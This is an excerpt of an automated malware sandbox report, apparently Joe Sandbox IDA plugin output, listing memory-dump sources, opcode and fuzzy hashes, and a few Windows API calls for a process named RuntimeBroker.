                                            • Instruction ID: 41620051195e08cb1a50dfe0de719d1019112e1b173c16653483a5f9b00ddb60
                                            • Opcode Fuzzy Hash: 7f13e8138c1791259c1140d5bd3784a20a901d6bb4fde308a7b72904709a4917
                                            • Instruction Fuzzy Hash: 6D2124B1C046599BCB14DF9AD844B9EFBB4FB48320F10812AE919A7210D774A900CFA0
                                            APIs
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 05844170
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 73a77a4cb0c79eaa63d0d531aa07c21f547c21adab15dcb57642eaddde81f036
                                            • Instruction ID: f402c9c82612a39047e4ea4f71982ca3f21df15879183c7fb434d66421751778
                                            • Opcode Fuzzy Hash: 73a77a4cb0c79eaa63d0d531aa07c21f547c21adab15dcb57642eaddde81f036
                                            • Instruction Fuzzy Hash: 9A2136B1D0565A9BCB14CFAAD844B9EFBB5FF48320F14825AD819A7210C738A944CFA1
                                            APIs
                                            • TerminateProcess.KERNELBASE(?,00000008), ref: 0584FB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProcessTerminate
                                            • String ID:
                                            • API String ID: 560597551-0
                                            • Opcode ID: 7ef04ba6a07fd865f01561214e94723802453634b6da039c81e5d53fd709fd0a
                                            • Instruction ID: b46ccd590db3eb91c2b3f114af104cac8c729f5bdc91bd111e4bde483d00c6cf
                                            • Opcode Fuzzy Hash: 7ef04ba6a07fd865f01561214e94723802453634b6da039c81e5d53fd709fd0a
                                            • Instruction Fuzzy Hash: E91125718006498FDB10CF9AC585BDEFBF4EF89320F248429D968A7341D778A944CFA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: c7133e5aa447cc297c9e2d0aa9063e0ee182249b291720c7b8646e23f8fa92bc
                                            • Instruction ID: 25a0685e124786076dd1e734dab65e7fcda93595e80f95d5b282cb2c4c7bbd46
                                            • Opcode Fuzzy Hash: c7133e5aa447cc297c9e2d0aa9063e0ee182249b291720c7b8646e23f8fa92bc
                                            • Instruction Fuzzy Hash: 4C1100B180464CCFCB20DF9AC488B9EFBF5EB49324F20845AD919B7240D379A944CFA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43861856e693ddca609ee77cd8b589f98222b434110ee4a2e942915d0f15bc87
                                            • Instruction ID: 567e12b098bc1b33d69b578424b0c3c3ab80f2ff502031a7dfe97b048b18d2a7
                                            • Opcode Fuzzy Hash: 43861856e693ddca609ee77cd8b589f98222b434110ee4a2e942915d0f15bc87
                                            • Instruction Fuzzy Hash: D321E071504200DFDB25DF98E980B26FF65EBA8718F3481ADE90A0A256C336D456CAE1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 338ff387e8ce63aaae5f9d9072712287bfffcee8998520f812c2ea0b24878fcb
                                            • Instruction ID: c67bb18912aca9c327b5ff02dd0fee93bd72ea6c47b241da510eab7f345d7fb1
                                            • Opcode Fuzzy Hash: 338ff387e8ce63aaae5f9d9072712287bfffcee8998520f812c2ea0b24878fcb
                                            • Instruction Fuzzy Hash: DC212FB1104204DFDB25DF94D8C0F26FF62FB98B24F2085ADE9091A25AC33AD456CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction ID: ded18c13732ff9edff11d893a577ce9289dd0d782ab3dfb4636aa93e6dde4d94
                                            • Opcode Fuzzy Hash: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction Fuzzy Hash: 23119D76504240DFDB16CF54D9C4B16BF62FB98724F2485ADD8090A256C336D456CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction ID: b34fe2c78b8ca8a726ea087eda055f64b95c91a8ba54a708ba18759c5bc9ec92
                                            • Opcode Fuzzy Hash: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
                                            • Instruction Fuzzy Hash: 0011AF76504244CFCB16CF54D9C4B16FF62FB84714F2486ADD8490B257C336D45ACBA1

                                            Non-executed Functions

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d8491dba5c73b4c1d0e0aa14ea8cf4762ae4f9eb04086747fabc0d41ddd2e03
                                            • Instruction ID: 458444700accddc9be5287144c2e5a50c60e76f541e7473d218b1bb7418a4fcb
                                            • Opcode Fuzzy Hash: 2d8491dba5c73b4c1d0e0aa14ea8cf4762ae4f9eb04086747fabc0d41ddd2e03
                                            • Instruction Fuzzy Hash: 89B19034A0462CCFDB14DB69D594B7E76B6FB88310F258429ED06D7290CB39DC828F95